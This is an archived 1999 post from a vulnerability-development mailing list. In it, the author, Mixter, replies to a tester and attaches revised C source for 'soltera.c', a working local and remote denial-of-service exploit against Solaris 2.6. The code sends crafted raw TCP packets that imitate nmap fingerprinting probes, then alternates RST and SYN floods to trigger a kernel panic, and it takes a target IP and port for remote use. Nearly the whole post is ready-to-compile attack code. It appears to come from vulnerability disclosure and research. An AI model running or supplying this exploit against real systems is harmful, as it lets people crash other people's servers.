Vulnerability Development mailing list archives
Re: solaris DoS (fwd)
From: mixter () NEWYORKOFFICE COM (Mixter)
Date: Wed, 6 Oct 1999 01:03:34 +0200
Hi, sorry for my sloppy coding, the attached version should compile on any solaris box (with -DSOLARIS) and is a bit tuned The vulnerability seems to get triggered when you repeatedly send a packet with rst flag and one with syn flag set afaik On Mon, 4 Oct 1999, Erik Parker wrote:
Mindsec just got time to test this.. However it doesn't compile on a Solaris 2.6 machine. In Addition, I have a fully patched Enterprise 250 I tested this on, running 2.6 (the same machine we tried to compile this on), and the nmap problem doesn't seem to exist either. Perhaps I will test this on a newly installed Ultra 10. I was also check this (and a few other problems) against the Solaris 8 machine we are testing. We have Solaris 8 running an ultra 10.. Just for OS testing, but we will also try some of the past exploits and problems against it.
---------- mixter () newyorkoffice com darknetworks.net/~mixter /* soltera.c - (c) Sep 1999 by Mixter * Local / Remote DoS against Solaris 2.6 (other versions?) * * Description: nmap fingerprint scans against any daemon that * terminates right after the scans are able to produce a kernel * panic on Solaris 2.6. (found by D.Brumley) * Local exploit: this program will create, scan and kill a listening * server. Just run it without arguments. * Remote exploit: soltera <ip> <port> - this _might_ work for a * service started again by inetd for every new session. * * cc -lnsl -lsocket -DSOLARIS soltera.c -o soltera * * +++ root priviledges are needed for the fingerprinting +++ */ #define PORT 0xC0D3 #define REPEAT 255 #include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <strings.h> #include <netinet/in.h> #include <sys/signal.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <netdb.h> #include <arpa/inet.h> #include <errno.h> #include <signal.h> void server (int); void fakeosscan (u_long, int); #define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min)) #define ANS "\x1b\x5b" #define TH_FIN 0x01 #define TH_SYN 0x02 #define TH_RST 0x04 #define TH_PUSH 0x08 #define TH_ACK 0x10 #define TH_URG 0x20 #define TH_BOG 64 /* #define WINSIZ 1024 * (ih->ttl % 4 + 1) */ #define WINSIZ 2048 #ifdef SOLARIS #include <sys/stream.h> #include <sys/dlpi.h> #include <sys/bufmod.h> #include <netinet/ip_var.h> #define htons(x) (x) #define htonl(x) (x) #define u_int8_t uint8_t #define u_int16_t uint16_t #define u_int32_t uint32_t #endif struct iphdr { #if __BYTE_ORDER == __LITTLE_ENDIAN u_int8_t ihl:4; u_int8_t version:4; #elif __BYTE_ORDER == __BIG_ENDIAN u_int8_t version:4; u_int8_t ihl:4; #else #error "Please fix <bytesex.h>" #endif u_int8_t tos; u_int16_t tot_len; u_int16_t id; u_int16_t frag_off; u_int8_t ttl; u_int8_t protocol; u_int16_t check; u_int32_t saddr; u_int32_t daddr; }; struct tcphdr { u_int16_t source; u_int16_t dest; u_int32_t seq; u_int32_t ack_seq; #if __BYTE_ORDER == __LITTLE_ENDIAN u_int8_t th_x2:4; u_int8_t th_off:4; #endif #if __BYTE_ORDER == __BIG_ENDIAN /* u_int8_t th_off:4; u_int8_t th_x2:4; */ #endif u_int8_t th_flags; u_int16_t th_win; u_int16_t check; u_int16_t th_urp; }; u_short ip_sum (addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } int main (int ac, char **av) { int p = PORT, pid; u_long ia; if (ac < 2 || !(ia = inet_addr (av[1]))) { printf (ANS "0;32m[using ip 127.0.0.1]\n"); ia = inet_addr ("127.0.0.1"); } else printf (ANS "0;32m[using ip %s]\n", av[1]); if (ac >= 3) if (atoi (av[2])) p = atoi (av[2]); printf (ANS "0;34m[using port %d]\n", p); if (getuid ()) { printf ("You need root to use fingerprinting locally...\n"); printf ("Listening as server only, hit CTRL+C to abort.\n"); for (;;) server(p); } pid = fork (); if (!pid) server (p); sleep (3); fakeosscan (ia, p); if (kill (pid, SIGKILL) == -1) printf (ANS "0;31mFAILED to kill server: %s\n", strerror (errno)); else printf (ANS "0;31m[server (pid: %d) killed]\n", pid); sleep (3); fakeosscan (ia, p); sleep (10); printf (ANS "0;35m[all done]%s0;0m\n", ANS); return 0; } void server (int port) { int c, e = sizeof (struct sockaddr_in); struct sockaddr_in l, r; l.sin_family = AF_INET; l.sin_port = htons (port); l.sin_addr.s_addr = INADDR_ANY; memset (l.sin_zero, 0, 8); c = socket (AF_INET, SOCK_STREAM, 0); bind (c, (struct sockaddr *) &l, sizeof (struct sockaddr)); listen (c, 0xFF); printf (ANS "1;33m[server listening on port %d]\n", port); while (accept (c, (struct sockaddr *) &r, &e)); } void fakeosscan (u_long ip, int port) { int r = socket (AF_INET, SOCK_STREAM, 0), optlen = 20, i = 0; int orig = getrandom (1024, 65534); char synb[8192]; struct sockaddr_in sin; struct iphdr *ih = (struct iphdr *) synb; struct tcphdr *th = (struct tcphdr *) (synb + sizeof (struct iphdr)); u_long seq = random (); char *eoh = (synb + sizeof (struct iphdr) + sizeof (struct tcphdr)); char *options = "\003\003\012\001\002\004\001\011\010\012\077\077\077\077\000\000\000\000\000\000"; printf (ANS "1;30m[initiating fingerprinting simulation on port %d]\n", port); sin.sin_family = AF_INET; sin.sin_port = htons (port); sin.sin_addr.s_addr = ip; connect (r, (struct sockaddr *) &sin, sizeof (sin)); close (r); r = socket (AF_INET, SOCK_RAW, IPPROTO_RAW); ih->version = 4; ih->ihl = 5; ih->tos = 0x00; ih->id = htons (random ()); ih->frag_off = 0; ih->ttl = getrandom (0, 255); ih->protocol = IPPROTO_TCP; ih->check = 0; ih->saddr = 0; ih->daddr = ip; th->source = htons (orig); th->dest = htons (port); th->seq = seq; th->ack_seq = 0; th->th_flags = 0; th->th_win = htons (WINSIZ); th->check = 0; th->th_urp = 0; memset (eoh, 0, 20); memcpy (eoh, options, optlen); /* packet 1 */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_BOG | TH_SYN; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* packet 2 */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = 0; th->source++; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* packet 3 */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_SYN | TH_FIN | TH_URG | TH_PUSH; th->source++; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* packet 4 */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_ACK; th->source++; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* packet 5 */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_SYN; th->source++; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* packet 6 */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_ACK; th->source++; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* guess */ ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_FIN | TH_PUSH | TH_URG; th->source++; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); /* we omit the udp stuff */ /* the actual mutex_enter exploit (rst/syn/rst/syn...) */ optlen = 0; memset (eoh, 0, sizeof (options)); ih->tot_len = sizeof (ih) + sizeof (th) + optlen; th->th_off = 5 + (optlen / 4); th->th_flags = TH_SYN; for (i = 0; i <= REPEAT; i++) { if (i % 2) { th->th_flags = TH_SYN; th->th_win = htons (WINSIZ); } else { th->th_flags = TH_RST; th->th_win = 0; } th->source = orig + i; th->seq = seq + i; th->check = ip_sum (synb, (sizeof (struct iphdr) + sizeof (struct tcphdr) + optlen + 1) & ~1); ih->check = ip_sum (synb, (4 * ih->ihl + sizeof (struct tcphdr) + optlen + 1) & ~1); sendto (r, synb, 4 * ih->ihl + sizeof (struct tcphdr) + optlen, 0, (struct sockaddr *) &sin, sizeof (sin)); usleep (31337); } close (r); }
Current thread:
- Re: solaris DoS (fwd) Erik Parker (Oct 04)
- Re: solaris DoS (fwd) Mixter (Oct 05)
- Re: solaris DoS (fwd) Drazen Kacar (Oct 05)
- Re: solaris DoS (fwd) Erik Parker (Oct 06)
- Re: solaris DoS (fwd) Drazen Kacar (Oct 07)
- Re: solaris DoS (fwd) Arindum Mukerji (Oct 07)
- Re: solaris DoS (fwd) Erik Parker (Oct 07)
- Re: solaris DoS (fwd) Drazen Kacar (Oct 05)
- Window manager - implementation bug/feature ??? Mithun Bhattacharya (Oct 06)
- Re: Window manager - implementation bug/feature ??? Chris Wilson (Oct 07)
- Re: Window manager - implementation bug/feature ??? Erik Parker (Oct 07)
- Re: Window manager - implementation bug/feature ??? Michael Jennings (Oct 07)
- Re: Window manager - implementation bug/feature ??? Erik Parker (Oct 08)
- Re: solaris DoS (fwd) Mixter (Oct 05)